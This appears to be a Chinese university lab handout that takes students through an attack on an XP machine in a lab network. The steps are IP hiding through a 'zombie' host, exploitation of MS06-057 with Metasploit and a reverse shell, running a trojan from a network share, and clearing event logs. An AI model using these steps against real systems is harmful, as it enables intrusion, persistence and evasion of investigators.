当前位置:文档之家› lab5-网络攻防基本步骤

lab5-网络攻防基本步骤

网络攻击实例
实验目的:通过本实例熟悉一个完整的网络攻击的基本步骤
实验环境:局域网中xp系统的pc机两台(被攻击的系统ie为6.0 sp1/sp2,并关闭杀毒软件)和metasploit软件、木马软件、日志清除软件(实验已提供)
实验步骤:
Ⅰ、实验简介:通过对实验目标主机(本例中A机为目标机)攻击前后的各个步骤实践,从而熟悉一次完整的网络攻击的基本步骤。

实验拓扑:
Ⅱ、下面以网络攻击“五部曲”进行各个步骤介绍。

1、隐藏IP
这一步必须做,因为如果自己的入侵的痕迹被发现了,当网警找上门的时候就一切都晚了。

通常有两种方法实现自己IP的隐藏:
第一种方法是首先入侵互联网上的一台电脑(俗称“肉鸡”),利用这台电脑进行攻击,这样即使被发现了,也是“肉鸡”的IP地址。

(本例为了节省时间已经将本机主机B假设成了一台肉鸡,若要抓取肉鸡可以利用实验三的知识)
第二种方法是利用代理。

2、踩点扫描
踩点就是通过各种途径对所要攻击的目标进行多方面的了解(包括任何可得到的蛛丝马迹,但要确保信息的准确),确定攻击的时间和地点。

扫描的目的是利用各种工具在攻击目标的IP地址或地址段的主机上寻找漏洞。

扫描分成两种策略:被动式策略和主动式策略。

常见的踩点方法包括:
在域名及其注册机构的查询
目标性质的了解
对主页进行分析
邮件地址的搜集
目标IP地址范围查询。

本例实验环境特殊,直接就是在同一个局域网里所以直接通过简单的扫描就可以踩点到目标机A的信息。

下面假设我们已经踩点到目标机A的ip为“192.168.1.233”,浏览器为ie6.0 sp2 所以我们可以利用本地主机B对目标机A是可信的(他们同处一个局域网,假设他们是可信的),对目标机A进行URL诱骗攻击。

3、获得系统或管理员权限
得到管理员权限的目的是连接到远程计算机,对其进行控制,达到自己攻击目的。

获得系统及管理员权限的方法有:
通过系统漏洞获得系统权限
通过管理漏洞获得管理员权限
通过软件漏洞得到系统权限
通过监听获得敏感信息进一步获得相应权限
通过弱口令获得远程管理员的用户密码
通过穷举法获得远程管理员的用户密码
通过攻破与目标机有信任关系另一台机器进而得到目标机的控制权
通过欺骗获得权限以及其他有效的方法。

本例就软件漏洞来获取权限,简单步骤如下(Metasploit使用方法,若不熟悉,请返回实验三学习):
3.1、下面就在实验三的学习基础之上利用metasploit里面的MS06-057(本案例环境特殊,都在同一个局域网里且系统完全一样,所以可以通过扫描本地主机B知道目标机A的漏洞,所以这里利用的360进行本地扫描得出了ms06-057这个漏洞)
3.2、metasploit基本配置和实验三一样,选择sehllcode时仍然选择windows/sell_reverse_tcp,在设备shellcode时注意相应的位置,如下图的“192.168.1.123”要对应肉鸡的主机ip(本例就填写本地的ip)。

3.3、运行exploit,特别注意:此处生成了.123:8082/dmXQ6q42bgyQYQ(注意该url是根据程序生成的,不是固定的),这个就是要让目标机A访问的url地址,只有目标机A访问了这个url才能成功。

本例就假设目标机A信任了肉鸡(该肉鸡在本例中就是本地主机B),并让主机A主动通过ie访问url。

成功后本地机B提示如下图:
3.4、当目标机A访问了上述url,便可点击上图“session”弹出连接成功的远程cmd shell。

这时便取得了目标机A的本地用户的权限了。

4、种植后门
为了保持长期对自己胜利果实的访问权,在已经攻破的计算机上种植一些供自己访问的后门。

本例就上传一个木马(附件已提供)。

4.1生成木马服务端。

运行暗组主程序,如下图。

然后点击“生成服务端”。

4.2 在生成服务端对话框里只需更改“上线域名”处为肉鸡ip(本例直接填写自己主机ip 即可)。

然后点击“生成”,接着设置存储名字(此次设置为“haha.exe”,后面方面访问)。

成功后将弹出生成服务端成功信息(如下提示对话框图)。

4.3、将生成的服务端共享到“肉鸡”上(即本例的主机B)。

共享文件方法这里就不赘述了。

4.4、将暗组木马的客户端开始监听。

注意:由于之前生成的服务端没密码,所以这里也要去除连接密码文本框里的密码,将其设置为空,然后直接单击“开始监听”即可,如下图。

4.5、通过返回的远程session,访问共享的木马服务端。

命令为start \\192.168.1.123\test\haha.exe,如下图
(注意start后有空格,ip地址为肉鸡的ip,test在肉鸡上共享的文件夹,haha.exe是木马服务端)。

4.6、运行成功后,主机目标机A就和本地木马客户端主动连接了。

接着就可以在目标机A 上做进一步操作了。

比如建立超级隐藏账户(实验已提供了教程,见视频材料)
5、在网络中隐身
一次成功入侵之后,一般在对方的计算机上已经存储了相关的登录日志,这样就容易被管理员发现。

在入侵完毕后需要清除登录日志已经其他相关的日志。

案例三:清除日志
在命令行执行清除日志命令之前,将clearel.exe拷贝到目标机中。

使用工具软件clearel.exe,可以方便的清除系统日志。

执行清除主机日志命令,命令分别为删除系统日志(Clearel System)、安全日志(Clearel Security)、应用程序日志(Clearel Application)和删除全部日志(Clearel All)。

命令执行的过程如下二图所示。

注:此处Copy命令的格式为:copy 源路径和文件名目标路径和文件名此时远程目标机A上的日志就被清除了。

Ⅲ、评价标准:
是否渗透成功;
是否成功安置木马;
是否成功删除日志;
是否熟悉了网络攻击的几个基本步骤。

相关主题